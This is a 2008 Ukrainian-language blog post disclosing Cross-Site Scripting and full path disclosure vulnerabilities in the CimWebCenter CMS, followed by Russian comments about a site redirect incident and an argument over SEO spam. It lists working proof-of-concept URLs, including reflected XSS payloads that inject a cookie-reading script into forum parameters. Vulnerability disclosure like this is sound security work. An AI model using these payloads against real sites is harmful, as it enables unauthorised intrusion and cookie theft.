Уразливості в CimWebCenter
23:54 06.11.2008Ще 26.06.2006 я знайшов Cross-Site Scripting та Full path disclosure уразливості в системі CimWebCenter. Дірки виявив на офіційному сайті системи http://cimwebcenter.com, а також перевірив їх ще на двох сайтах на даній CMS (де і виявив Full path disclosure).
XSS:
http://site/forum/?mid=28&do=show_mess&tid=26%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&mode=-1
http://site/forum/?mid=28&do=show_mess&tid=26&mode=-1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full path disclosure:
http://site/forum/?mid=28&do=show_mess&tid=26&mode=/
http://site/forum/?mid=28&do=/&tid=26&mode=-1
http://site/forum/?mid=/&do=show_mess&tid=26&mode=-1
Уразливі CimWebCenter 4.0 та попередні версії.
Про уразливості я одразу ж повідомив розробникам, які не відповіли і повністю проігнорували моє повідомлення. Це було ще до відкриття мого сайту і тому про цей випадок я не написав в новинах (але я собі відмітив, щоб про ці уразливості згадати, і сьогодні нарешті я знайшов час для цього).
Даний випадок був одним з багатьох в період з 2005 по середину 2006, коли власники сайтів і веб девелопери переважно ігнорували мої повідомлення про уразливості. Що й спонукало мене зробити свій веб проект (в літку 2006), в якому публічно оприлюднювати інформацію про уразливості на сайтах і в веб додатках, щоб стимулювати адмінів й девелоперів виправляти дірки. Дану діяльність я тоді й назвав соціальним секюріти аудитом.
Четвер, 12:51 08.10.2009
Сегодня был звонок от одного клиента данной веб-студии:
- “Здравствуйте! Почему когда заходишь на наш сайт - перебрасывает на Ваш?”
Проверил код их страницы - там какие то шутники вставили ява-скрипт -редирект на наш сайт. Это произошло - 2009 году! Проверил работу ЦМС-ки - там кроме вышеперечисленных баг есть еще серьезная (в плане представляемых возможностей) и весьма тупая (от разработчиков) SQL-injection
Субота, 08:45 10.10.2009
Уважаемый!
Имейте совесть!
Или запостите мою ссылку или улите весь предыдущий пост! Я не нанимался Вам на шару контент писать! Первый раз такое встречаю. Пишу по теме так еще и ссылку удаляют
Субота, 08:48 10.10.2009
Упс… прошу прощения. а следующие посты идут с сылкой и без модерации? ТОгда виноват. Беру все свои слова назад. яж не знал…
Субота, 14:34 10.10.2009
InWeb
На взломанных сайтах редиректоры на чужой сайт обычно не встравляют и ты должен это понимать
. Обычно тот кто взламывает сайт вставляет редиректор на свой сайт. А в данном случае редиректор с сайта одной вебдев фирмы пересылает на сайт другой (конкурирующей) фирмы - это всё весьма подозрительно. В любом случае взломщики сайта cimwebcenter.com явно были неравнодушны к твоей веб студии 
.
Когда я зашёл на этот сайт, то редиректора уже не было, поэтому не могу потдвердить данный инцидент.
Уязвимостей в их движке хватает, как тупых, так и не очень тупых. О наличии SQL Injection в движке мне известно (причём нескольких).
07.11.2008, после написания данного поста, я исследовал несколько сайтов на данном движке, и нашёл, помимо вышеперечисленных Cross-Site Scripting и Full path disclosure дыр, также ещё три SQL Injection, SQL DB Structure Extraction, XSS и три Code Execution (позволяющие исполнять PHP код). CE потенциальные, т.к. вслепую их дожать (тогда) не удалось. Если я их дожму вслепую, или если мне исходник системы попадётся, то данные CE дырки будут представлять ещё большую опасность, чем имеющиеся SQLi (т.к. это уже будут уязвимости критического риска). И со временем я опубликую у себя на сайте эти уязвимости в CimWebCenter.
Субота, 18:08 10.10.2009
InWeb, у меня на сайте используется WordPress - достаточно распространённый движок, и с его особенностями работы ты вполне мог ранее сталкиваться. Но в любом случае, незнание не освобождает от необходимости прилично себя вести
. В том числе не заниматься SEO-спамом.
У меня на сайте премодерируется только первый комментарий, а последующие постятся без модерации - так я настроил (в любом случае я слежу за всеми коментами). При этом WP позволяет гибко включать премодерацию и для уже разрешённых комментаторов, поэтому увлекаться SEO-спамом ни у кого не получится.
Дорогой мой, за мою совесть не переживай, она у меня есть и работает весьма эффективно. Как я уже тебе сказал, SEO-спамом не нужно увлекаться - он запрещён у меня на сайте, как и любой другой спам. А т.к. твой пост был сео-спамом, запощенным ради ссылки (что было очевидно, и что ты и сам в следующем коменте подтвердил), поэтому я и удалил твою ссылку. Я не раздаю просто так тИЦ, а PR не раздаётся на уровне двикжа (через nofollow).
Не имей дурной привычки указывать владельцам сайтов, что им делать. Мне виднее, что делать с коментами, особенно сео-спамом.
Чтобы иметь возможность постить у меня в коментах ссылки, нужно себя хорошо зарекомендовать. И в дальнейшем спокойно постить коменты с ссылками без премодерации. А ты же решил сразу сео-спамом заняться, что и привело к удалению ссылки. А после того, как ты начал несерьёзные притензии высказывать, да ещё и прямо признался, что ради ссылки запостил, у тебя будет мало шансов себя зарекомендовать.
Во-первых, основной контент у меня - это посты на сайте, а коменты - это вторичный контент, и будут ли они, или нет, за это я не переживаю. Во-вторых, коменты у меня люди пишут не для получения обратных ссылок (т.е. сео-спам), а по собственному желанию.
Поэтому бери пример с других посетителей сайта (которые постят без ссылок), и не занимайся сео-спамом. Весь спам, включая сео-спам, я удаляю (как на данном, так и на всех моих сайтах), за исключением тематического спама, который я оставляю без ссылок.
Кому нужны беклинки, тот пусть не спамит, а занимается обменом ссылками, покупкой ссылок или использует мой SEO метод.